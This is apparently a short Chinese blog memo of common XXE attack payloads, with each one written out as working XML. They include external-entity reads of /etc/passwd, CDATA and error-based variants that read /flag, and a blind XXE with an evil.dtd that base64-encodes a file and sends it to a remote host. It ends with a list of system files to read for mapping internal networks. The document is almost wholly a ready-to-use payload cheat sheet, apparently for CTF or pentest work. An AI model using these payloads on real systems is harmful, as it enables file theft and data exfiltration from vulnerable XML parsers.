2022-08-27 2022-08-27
记录一下常用 xxe payload
想到啥写啥, 只是一个备忘录
引用外部实体
SYSTEM
1
<!ENTITY xxs SYSTEM "file:///etc/passwd" >
PUBLIC
1
<!ENTITY % remote PUBLIC "dtd" "http://127.0.0.1/evil.dtd" >
常规 XXE
通用实体
1
2
3
4
5
6
< ? xml version= "1.0" encoding= "utf-8" ? >
<!DOCTYPE test [
<!ENTITY file SYSTEM "file:///etc/passwd" >]>
<test >
&file;
</test >
参数实体 (利用 CDATA)
1
2
3
4
5
6
7
8
9
10
< ? xml version= "1.0" encoding= "utf-8" ? >
<!DOCTYPE test [
<!ENTITY % start "<![CDATA[" >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY % end "]]>" >
<!ENTITY % dtd SYSTEM "http://127.0.0.1/evil.dtd" >
%dtd; ]>
<test >
&all;
</test >
evil.dtd
1
2
< ? xml version= "1.0" encoding= "utf-8" ? >
<!ENTITY all "%start;%xxe;%end;" >
Blind XXE
payload
1
2
3
4
<!DOCTYPE test [
<!ENTITY % remote SYSTEM "http://127.0.0.1/evil.dtd" >
%remote;%int;%send;
]>
evil.dtd
1
2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd" >
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://127.0.0.1/?p=%file;'>" >
Error-based XXE
引用本地 dtd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
< ? xml version= "1.0" ? >
<!DOCTYPE root [
<!ELEMENT root ANY >
<!ELEMENT message ANY >
<!ENTITY % local SYSTEM "/usr/share/yelp/dtd/docbookx.dtd" >
<!ENTITY % file SYSTEM "file:///flag" >
<!ENTITY % ISOamso '
<!ENTITY % eval "
<!ENTITY &#x25; error SYSTEM '%file;'>
">
%eval;
' >
%local;
]>
<root >
<message > 123</message >
</root >
多层内部实体嵌套绕过, 无需引用 dtd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
< ? xml version= "1.0" ? >
<!DOCTYPE root [
<!ELEMENT root ANY >
<!ELEMENT message ANY >
<!ENTITY % file SYSTEM "file:///flag" >
<!ENTITY % eval1 '
<!ENTITY % eval2 "
<!ENTITY &#x25; error SYSTEM '%file;'>
">
%eval2;
' >
%eval1;
]>
<root >
<message > 123</message >
</root >
获取内网网段
1
2
3
4
5
6
7
/etc/network/interfaces
/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie